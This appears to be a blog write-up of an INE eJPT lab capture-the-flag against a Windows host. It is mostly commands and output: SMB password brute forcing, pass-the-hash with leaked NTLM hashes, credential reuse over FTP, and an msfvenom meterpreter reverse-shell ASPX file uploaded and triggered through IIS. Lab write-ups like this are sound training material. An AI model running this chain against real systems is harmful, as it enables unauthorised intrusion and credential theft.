eJPT - Host & Network Penetration Testing: Exploitation CTF 2
eJPT - Host & Network Penetration Testing: Exploitation CTF 2
This lab focuses on exploiting a Windows target machine. By identifying services, analyzing misconfigurations, and leveraging discovered credentials, you’ll uncover and capture the flags. Tasks involve exploiting SMB misconfigurations, utilizing NTLM hashes, and gaining access to the system.
Lab Environment
A target machine is accessible at target.ine.local. Identify the services and capure the flags.
- Flag 1: Looks like smb user tom has not changed his password from a very long time.
- Flag 2: Using the NTLM hash list discovered in the previous challenge, can you compromise the smb user nancy?
- Flag 3: I wonder what the hint found in the previous challenge be useful for!
- Flag 4: Can you compromise the target machine and retrieve the C://flag4.txt file?
The following wordlist will be useful:
- /usr/share/wordlists/metasploit/unix_passwords.txt
Tools
- Metasploit
- Nmap
- smbmap
- Firefox
Flag 1:
Looks like smb user tom has not changed his password from a very long time.
Alright let’s start the nmap scan to gather information about the system here is the info we got form target
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
┌──(root㉿INE)-[~]
└─# nmap -sC -sV target.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-31 08:47 IST
Nmap scan report for target.ine.local (10.5.26.9)
Host is up (0.0018s latency).
Not shown: 990 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/8.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2025-05-31T03:18:16+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=WIN-M878Q9NE9S6
| Not valid before: 2025-01-08T05:31:54
|_Not valid after: 2025-07-10T05:31:54
| rdp-ntlm-info:
| Target_Name: WIN-M878Q9NE9S6
| NetBIOS_Domain_Name: WIN-M878Q9NE9S6
| NetBIOS_Computer_Name: WIN-M878Q9NE9S6
| DNS_Domain_Name: WIN-M878Q9NE9S6
| DNS_Computer_Name: WIN-M878Q9NE9S6
| Product_Version: 6.3.9600
|_ System_Time: 2025-05-31T03:18:09+00:00
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-time:
| date: 2025-05-31T03:18:12
|_ start_date: 2025-05-31T02:57:55
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled but not required
Based on the question we already know the username which is tom so let’s do a brute force on the target using hydra
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(root㉿INE)-[~]
└─# crackmapexec smb target.ine.local -u tom -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing RDP protocol database
[*] Initializing SSH protocol database
[*] Initializing MSSQL protocol database
[*] Initializing FTP protocol database
[*] Initializing LDAP protocol database
[*] Initializing WINRM protocol database
[*] Initializing SMB protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SMB target.ine.local 445 WIN-M878Q9NE9S6 [*] Windows 8.1 / Server 2012 R2 Build 9600 x64 (name:WIN-M878Q9NE9S6) (domain:WIN-M878Q9NE9S6) (signing:False) (SMBv1:False)
SMB target.ine.local 445 WIN-M878Q9NE9S6 [-] WIN-M878Q9NE9S6\tom:admin STATUS_LOGON_FAILURE
SMB target.ine.local 445 WIN-M878Q9NE9S6 [-] WIN-M878Q9NE9S6\tom:123456 STATUS_LOGON_FAILURE
SMB target.ine.local 445 WIN-M878Q9NE9S6 [+] WIN-M878Q9NE9S6\tom:felipe
Here we found that username tom password is felipe, tom:felipe and now that we have the information let’s start use the smbmap to identify any files that we can gathering using these creds.
We found some interesting files, Let’s take a look at HRDocuments and we Found the Flag1 and we also found something others such as Leaked-hashes.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(root㉿INE)-[~]
└─# smbmap -H target.ine.local -u tom -p felipe
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.2 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authentidated session(s)
[+] IP: 10.5.16.222:445 Name: target.ine.local Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
D$ NO ACCESS Default share
HRDocuments READ ONLY
IPC$ READ ONLY Remote IPC
ITResources NO ACCESS
print$ READ ONLY Printer Drivers
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿INE)-[~]
└─# smbclient //target.ine.local/HRDocuments -U tom
Password for [WORKGROUP\tom]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat May 31 19:15:38 2025
.. D 0 Sat May 31 19:15:38 2025
flag1.txt A 34 Sat May 31 19:15:38 2025
leaked-hashes.txt A 6665 Fri Jun 14 11:35:55 2024
5678591 blocks of size 4096. 58043 blocks available
smb: \> get flag1.txt
getting file \flag1.txt of size 34 as flag1.txt (3.7 KiloBytes/sec) (average 3.7 KiloBytes/sec)
smb: \> !cat flag1.txt
f8c013534b1f4702bb8b12*******
Flag 2:
Using the NTLM hash list discovered in the previous challenge, can you compromise the smb user nancy?
Hence we already hold the access to the hash, let’s try to found our way in using those, for this we’ll be using the msfconsole and with that smb_login
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
msf6 auxiliary(scanner/smb/smb_login) > set rhost target.ine.local
rhost => target.ine.local
msf6 auxiliary(scanner/smb/smb_login) > set pass_file leaked-hashes.txt
pass_file => leaked-hashes.txt
msf6 auxiliary(scanner/smb/smb_login) > set smbuser nancy
smbuser => nancy
msf6 auxiliary(scanner/smb/smb_login) > set createsession true
createsession => true
msf6 auxiliary(scanner/smb/smb_login) > run
[-] 10.5.16.222:445 - 10.5.16.222:445 - Failed: '.\nancy:aad3b435b51404eeaad3b435b51404ee:a01c5c6b02e0b6752a33d1e7b0a33aa0',
[-] 10.5.16.222:445 - 10.5.16.222:445 - Failed: '.\nancy:aad3b435b51404eeaad3b435b51404ee:34ec1e4f6f7cbe35a09ee51b1c0039d2',
[+] 10.5.16.222:445 - 10.5.16.222:445 - Success: '.\nancy:aad3b435b51404eeaad3b435b51404ee:b3ddea4b4b957f3e037af75cfe5317ad'
[*] SMB session 1 opened (10.10.47.2:36545 -> 10.5.16.222:445) at 2025-05-31 19:43:21 +0530
[*] target.ine.local:445 - Scanned 1 of 1 hosts (100% complete)
[*] target.ine.local:445 - Bruteforce completed, 1 credential was successful.
[*] target.ine.local:445 - 1 SMB session was opened successfully.
Now that we have created a session over the target let’s login
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
msf6 auxiliary(scanner/smb/smb_login) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 smb SMB nancy @ 10.5.16.222:445 10.10.47.2:36545 -> 10.5.16.222:445 (10.5.16.222)
msf6 auxiliary(scanner/smb/smb_login) > sessions 1
[*] Starting interaction with 1...
SMB (10.5.16.222) > shares
Shares
======
# Name Type comment
- ---- ---- -------
0 ADMIN$ DISK|SPECIAL Remote Admin
1 C$ DISK|SPECIAL Default share
2 D$ DISK|SPECIAL Default share
3 HRDocuments DISK
4 IPC$ IPC|SPECIAL Remote IPC
5 ITResources DISK
6 print$ DISK Printer Drivers
SMB (10.5.16.222) > shares -i ITResources
[+] Successfully connected to ITResources
SMB (10.5.16.222\ITResources) > dir
ls
===
# Type Name Created Accessed Written Changed Size
- ---- ---- ------- -------- ------- ------- ----
0 DIR . 2024-06-13T14:11:07+05:30 2025-05-31T19:15:38+05:30 2025-05-31T19:15:38+05:30 2025-05-31T19:15:38+05:30
1 DIR .. 2024-06-13T14:11:07+05:30 2025-05-31T19:15:38+05:30 2025-05-31T19:15:38+05:30 2025-05-31T19:15:38+05:30
2 FILE flag2.txt 2025-05-31T19:15:38+05:30 2025-05-31T19:15:38+05:30 2025-05-31T19:15:38+05:30 2025-05-31T19:15:38+05:30 34
3 FILE hint.txt 2024-06-13T14:45:39+05:30 2024-06-13T14:45:39+05:30 2024-06-13T16:00:47+05:30 2024-06-13T16:00:47+05:30 71
SMB (10.5.16.222\ITResources) > download flag2.txt
[*] Downloaded 34.00 B of 34.00 B (100.0%)
[+] Downloaded flag2.txt to flag2.txt
SMB (10.5.16.222\ITResources) > download hint.txt
[*] Downloaded 71.00 B of 71.00 B (100.0%)
[+] Downloaded hint.txt to hint.txt
with that we found the flag2 and also a creds for further investigation david:omnitrix_9901
Flag 3:
I wonder what the hint found in the previous challenge be useful for!
Now that we found the creds let’s try with ftp services which is running on target system and we managed to logged in and found the flag3!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root㉿INE)-[~]
└─# ftp target.ine.local
Connected to target.ine.local.
220 Microsoft FTP Service
Name (target.ine.local:root): david
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||49404|)
125 Data connection already open; Transfer starting.
06-13-24 10:36AM <DIR> aspnet_client
05-31-25 01:45PM 34 flag3.txt
06-13-24 10:34AM 99710 iis-85.png
06-13-24 10:34AM 701 iisstart.htm
226 Transfer complete.
ftp> get flag3.txt
local: flag3.txt remote: flag3.txt
229 Entering Extended Passive Mode (|||49407|)
125 Data connection already open; Transfer starting.
100% |********************************************************************************************************************************************| 34 9.10 KiB/s 00:00 ETA
226 Transfer complete.
34 bytes received in 00:00 (8.45 KiB/s)
ftp> !cat flag3.txt
5871dd181fee4eb4a4dc43a8********
Flag 4:
Can you compromise the target machine and retrieve the C://flag4.txt file?
After going through FTP and Web services, We found that the files in here are the one which is access through webpage, meaning we can upload a file in ftp and can be executed through webpage by accessing it. so let’s create a reverse shell to point the shell back to us, For that we’ll be using creating a reverse shell along with deploying a service to receive the connection and upload the shell script to ftp and accessed through webpage and gain access into the system.
Creating a reverse shell script
1
2
3
4
5
6
7
┌──(root㉿INE)-[~]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.47.2 LPORT=1234 -f aspx > shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of aspx file: 3658 bytes
Uploading the script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(root㉿INE)-[~]
└─# ftp target.ine.local
Connected to target.ine.local.
220 Microsoft FTP Service
Name (target.ine.local:root): david
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
229 Entering Extended Passive Mode (|||49474|)
125 Data connection already open; Transfer starting.
100% |********************************************************************************************************************************************| 3705 26.56 MiB/s --:-- ETA
226 Transfer complete.
3705 bytes sent in 00:00 (1.38 MiB/s)
ftp> dir
229 Entering Extended Passive Mode (|||49476|)
125 Data connection already open; Transfer starting.
06-13-24 10:36AM <DIR> aspnet_client
05-31-25 01:45PM 34 flag3.txt
06-13-24 10:34AM 99710 iis-85.png
06-13-24 10:34AM 701 iisstart.htm
05-31-25 02:39PM 3705 shell.aspx
226 Transfer complete.
Deploying receive back connection:
1
2
3
4
5
6
7
8
msf6 exploit(multi/handler) > set lhost 10.10.47.2
lhost => 10.10.47.2
msf6 exploit(multi/handler) > set lport 1234
lport => 1234
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.47.2:1234
Now that we deployed full setup let’s start executing the reverse shell! Navigate to http://target.ine.local/shell.aspx in the browser. we should observe that we have successfully obtained the shell.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.47.2:1234
[*] Sending stage (201798 bytes) to 10.5.29.153
[*] Meterpreter session 1 opened (10.10.47.2:1234 -> 10.5.29.153:49277) at 2025-05-31 20:25:49 +0530
meterpreter > cd /
meterpreter > dir
Listing: c:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2020-09-10 15:20:33 +0530 $Recycle.Bin
100666/rw-rw-rw- 1 fil 2013-06-18 17:48:29 +0530 BOOTNXT
040777/rwxrwxrwx 0 dir 2013-08-22 20:18:41 +0530 Documents and Settings
040777/rwxrwxrwx 0 dir 2013-08-22 21:22:33 +0530 PerfLogs
040555/r-xr-xr-x 4096 dir 2020-08-12 09:43:47 +0530 Program Files
040777/rwxrwxrwx 4096 dir 2022-11-15 12:21:37 +0530 Program Files (x86)
040777/rwxrwxrwx 4096 dir 2020-09-05 14:35:45 +0530 ProgramData
040777/rwxrwxrwx 0 dir 2024-06-13 14:11:17 +0530 Shares
040777/rwxrwxrwx 0 dir 2020-09-05 09:16:57 +0530 System Volume Information
040555/r-xr-xr-x 4096 dir 2025-01-09 11:06:51 +0530 Users
040777/rwxrwxrwx 24576 dir 2025-01-09 11:00:26 +0530 Windows
100444/r--r--r-- 398356 fil 2014-03-18 15:35:18 +0530 bootmgr
100666/rw-rw-rw- 34 fil 2025-05-31 20:16:14 +0530 flag4.txt
040777/rwxrwxrwx 0 dir 2024-06-13 16:05:01 +0530 inetpub
000000/--------- 0 fif 1970-01-01 05:30:00 +0530 pagefile.sys
meterpreter > cat flag4.txt
eb2aba7543c844ea977fdf6*******
meterpreter >
With that we found all the flag in this machine!!!
This post is licensed under CC BY 4.0 by the author.